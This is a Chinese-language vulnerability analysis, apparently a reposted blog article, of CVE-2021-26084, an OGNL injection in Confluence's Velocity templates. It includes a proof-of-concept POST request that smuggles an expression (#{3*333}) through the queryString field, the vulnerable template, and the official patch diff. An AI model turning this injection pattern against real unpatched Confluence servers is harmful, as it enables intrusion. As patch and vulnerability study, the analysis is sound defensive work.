CVE-2021-26084 漏洞分析

2023-10-17 17:52
文章标签 分析 漏洞 2021 cve 26084

本文主要是介绍CVE-2021-26084 漏洞分析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

基础知识

Velocity

  • .vm 结尾的文件一般为Velocity模板文件
  • $action
    • $action 是 velocity 上下⽂中的⼀个变量,⼀般在进⾏模板渲染前会设置到 context ⾥⾯。
    • $action 是当前访问路由对应的具体 Action 类。
    • $action.xxx 表⽰取对应 Action 类的 xxx 属性值

  • ${} 和 $!{}
    • ${} 输出表达式的计算结果,并进行过滤
    • $!{} 原样输出表达式的计算结果,不进行任何过滤
  • Velocity自定义标签
    • velocity ⾃定义的标签必须实现 Directive 类的 getName()、getType()、render() 三个⽅法。
    • getName() ⽅法表⽰标签的名字;getType() ⽅法则表⽰是⾏标签(LINE) 还是块标签(BLOCK); render() ⽅法则⽤来实现标签的具体处理逻辑。
  • velocity.properties 文件
    • 模板引擎初始化时会加载此文件
    • 配置log, 字符集编码等

    • userdirective:自定义函数路径

WebWork

  • 路由逻辑

Confluence

  • Confluence 7.12.3 依赖 Velocity 1.6.4
  • Confluence 自定义 Velocity 标签 Tag

OGNL表达式注入

漏洞环境版本

  • 7.12.3

漏洞原理

  • Confluence自定义的tag标签在渲染过程中在渲染$!的变量时会使用Ognl表达式来渲染
  • 检查手段被绕过
  • POC
POST /pages/doenterpagevariables.action HTTP/1.1
Host: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45queryString=aaaa\u0027%2b#{3*333}%2b\u0027bbb
  • 对应模板文件: confluence/pages/createpage-entervariables.vm
<html><head>#requireResource("confluence.web.resources:page-templates")<title>$action.getText("page.template.wizard")</title></head><body>#parse ( "/template/includes/actionerrors.vm" )#applyDecorator("root")#decoratorParam("helper" $action.helper)#decoratorParam("context" "space-pages")#decoratorParam("mode" "create-page")<div class="padded"><div class="steptitle" style="margin-top: 10px">$action.getText('pagevariables.step2')</div><p>$action.getText('text.pagevariables.step2.instructions')</p><div class="smallfont view-template"><div class="wiki-content">$action.renderedTemplateContent</div></div><form name="filltemplateform" method="POST" action="doenterpagevariables.action">#form_xsrfToken()#tag ("Hidden" "name='queryString'" "value='$!queryString'")#tag ("Hidden" "name='templateId'" "value='$pageTemplate.id'")#tag ("Hidden" "name='linkCreation'" "value='$linkCreation'")#tag ("Hidden" "name='title'" "value=title")#tag ("Hidden" "name='parentPageId'" "value=parentPageId")#tag ("Hidden" "name='fromPageId'" "value=fromPageId")#tag ("Hidden" "name='spaceKey'" "value=spaceKey")<div class="aui-toolbar2" role="toolbar"><div class="aui-toolbar2-inner"><input class="aui-button" type="button" value="$action.getText('back.witharrows.name')" onclick="javascript:history.go(-1)">#tag( "Submit" "name='confirm'" "id=confirm" "value='next.name'" "theme='notable'" "cssClass='aui-button'")</div></div></form>#parse ( "/pages/page-breadcrumbs.vm" )</div>#end</body>
</html>

漏洞修复

补丁

  • 补丁脚本运行结果
File 1: 'confluence/users/user-dark-features.vm':a. backing up file.. doneb. updating file.. donec. showing file changes..
70c70
<             #tag( "Component" "label='Enable dark feature:'" "name='featureKey'" "value='$!action.featureKey'" "theme='aui'" "template='text.vm'")
---
>             #tag( "Component" "label='Enable dark feature:'" "name='featureKey'" "value=featureKey" "theme='aui'" "template='text.vm'")d. validating file changes.. oke. file updated successfully!File 2: 'confluence/login.vm':a. backing up file.. doneb. updating file.. donec. showing file changes..
147c147
<                         #tag( "Hidden" "name='token'" "value='$!action.token'" )
---
>                         #tag( "Hidden" "name='token'" "value=token" )d. validating file changes.. oke. file updated successfully!File 3: 'confluence/pages/createpage-entervariables.vm':a. backing up file.. doneb. updating file.. donec. showing file changes..
24c24
<                 #tag ("Hidden" "name='queryString'" "value='$!queryString'")
---
>                 #tag ("Hidden" "name='queryString'" "value=queryString")
26c26
<                 #tag ("Hidden" "name='linkCreation'" "value='$linkCreation'")
---
>                 #tag ("Hidden" "name='linkCreation'" "value=linkCreation")d. validating file changes..oke. file updated successfully!File 4: 'confluence/template/custom/content-editor.vm':a. backing up file.. doneb. updating file.. donec. showing file changes..
64c64
<         #tag ("Hidden" "name='queryString'" "value='$!queryString'")
---
>         #tag ("Hidden" "name='queryString'" "value=queryString")
85c85
<             #tag ("Hidden" "id=sourceTemplateId" "name='sourceTemplateId'" "value='${templateId}'")
---
>             #tag ("Hidden" "id=sourceTemplateId" "name='sourceTemplateId'" "value=templateId")d. file updated successfully!File 5: 'confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader*.jar':a. extracting templates/editor-preload-container.vm from confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar..
Archive:  confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jarinflating: ./templates/editor-preload-container.vmb. updating file.. donec. showing file changes..
56c56
< #tag ("Hidden" "id=syncRev" "name='syncRev'" "value='$!{action.syncRev}'")
---
> #tag ("Hidden" "id=syncRev" "name='syncRev'" "value=syncRev")d. validating file changes.. oke. updating confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar with ./templates/editor-preload-container.vm..updating: templates/editor-preload-container.vm (deflated 59%)
-rw-r--r--  1 zhangxinqi  staff  13369  8 27 02:02 confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jarf. cleaning up temp files..okg. extracting templates/editor-preload-container.vm from confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar again to check changes within JAR..
Archive:  confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jarinflating: ./templates/editor-preload-container.vmh. validating file changes for file within updated JAR.. oki. cleaning up temp files..okUpdate completed!
  • 将模板文件中的$!删除
  • $action $!action 都删除
  • 所有的改动都位于tag标签下
  • 涉及5个文件的更改
    • confluence/users/user-dark-features.vm
      • http://127.0.0.1:8090/users/darkfeatures.action
      • 相关文档:Enable Edit in Office as a dark feature in Confluence | Confluence | Atlassian Documentation
    • confluence/login.vm
      • 注册功能
    • confluence/pages/createpage-entervariables.vm
      • http://127.0.0.1:8090/pages/doenterpagevariables.action
    • confluence/template/custom/content-editor.vm
    • templates/editor-preload-container.vm

参考资料

  • Confluence objects accessible from Velocity (atlassian.com)
  • dinhbaouit/CVE-2021-26084 (github.com)

这篇关于CVE-2021-26084 漏洞分析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/227009

相关文章

关于MyISAM和InnoDB对比分析

关于MyISAM和InnoDB对比分析

《关于MyISAM和InnoDB对比分析》:本文主要介绍关于MyISAM和InnoDB对比分析,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录开篇:从交通规则看存储引擎选择理解存储引擎的基本概念技术原理对比1. 事务支持:ACID的守护者2. 锁机制:并发控制的艺
阅读更多...
MyBatis Plus 中 update_time 字段自动填充失效的原因分析及解决方案(最新整理)

MyBatis Plus 中 update_time 字段自动填充失效的原因分析及解决方案(最新整理)

《MyBatisPlus中update_time字段自动填充失效的原因分析及解决方案(最新整理)》在使用MyBatisPlus时,通常我们会在数据库表中设置create_time和update... 目录前言一、问题现象二、原因分析三、总结:常见原因与解决方法对照表四、推荐写法前言在使用 MyBATis
阅读更多...
Python主动抛出异常的各种用法和场景分析

Python主动抛出异常的各种用法和场景分析

《Python主动抛出异常的各种用法和场景分析》在Python中,我们不仅可以捕获和处理异常,还可以主动抛出异常,也就是以类的方式自定义错误的类型和提示信息,这在编程中非常有用,下面我将详细解释主动抛... 目录一、为什么要主动抛出异常?二、基本语法:raise关键字基本示例三、raise的多种用法1. 抛
阅读更多...
github打不开的问题分析及解决

github打不开的问题分析及解决

《github打不开的问题分析及解决》:本文主要介绍github打不开的问题分析及解决,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、找到github.com域名解析的ip地址二、找到github.global.ssl.fastly.net网址解析的ip地址三
阅读更多...
Mysql的主从同步/复制的原理分析

Mysql的主从同步/复制的原理分析

《Mysql的主从同步/复制的原理分析》:本文主要介绍Mysql的主从同步/复制的原理分析,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录为什么要主从同步?mysql主从同步架构有哪些?Mysql主从复制的原理/整体流程级联复制架构为什么好?Mysql主从复制注意
阅读更多...
Python中文件读取操作漏洞深度解析与防护指南

Python中文件读取操作漏洞深度解析与防护指南

《Python中文件读取操作漏洞深度解析与防护指南》在Web应用开发中,文件操作是最基础也最危险的功能之一,这篇文章将全面剖析Python环境中常见的文件读取漏洞类型,成因及防护方案,感兴趣的小伙伴可... 目录引言一、静态资源处理中的路径穿越漏洞1.1 典型漏洞场景1.2 os.path.join()的陷
阅读更多...
java -jar命令运行 jar包时运行外部依赖jar包的场景分析

java -jar命令运行 jar包时运行外部依赖jar包的场景分析

《java-jar命令运行jar包时运行外部依赖jar包的场景分析》:本文主要介绍java-jar命令运行jar包时运行外部依赖jar包的场景分析,本文给大家介绍的非常详细,对大家的学习或工作... 目录Java -jar命令运行 jar包时如何运行外部依赖jar包场景:解决:方法一、启动参数添加: -Xb
阅读更多...
Apache 高级配置实战之从连接保持到日志分析的完整指南

Apache 高级配置实战之从连接保持到日志分析的完整指南

《Apache高级配置实战之从连接保持到日志分析的完整指南》本文带你从连接保持优化开始,一路走到访问控制和日志管理,最后用AWStats来分析网站数据,对Apache配置日志分析相关知识感兴趣的朋友... 目录Apache 高级配置实战:从连接保持到日志分析的完整指南前言 一、Apache 连接保持 - 性
阅读更多...
Linux中的more 和 less区别对比分析

Linux中的more 和 less区别对比分析

《Linux中的more和less区别对比分析》在Linux/Unix系统中,more和less都是用于分页查看文本文件的命令,但less是more的增强版,功能更强大,:本文主要介绍Linu... 目录1. 基础功能对比2. 常用操作对比less 的操作3. 实际使用示例4. 为什么推荐 less?5.
阅读更多...
spring-gateway filters添加自定义过滤器实现流程分析(可插拔)

spring-gateway filters添加自定义过滤器实现流程分析(可插拔)

《spring-gatewayfilters添加自定义过滤器实现流程分析(可插拔)》:本文主要介绍spring-gatewayfilters添加自定义过滤器实现流程分析(可插拔),本文通过实例图... 目录需求背景需求拆解设计流程及作用域逻辑处理代码逻辑需求背景公司要求,通过公司网络代理访问的请求需要做请
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2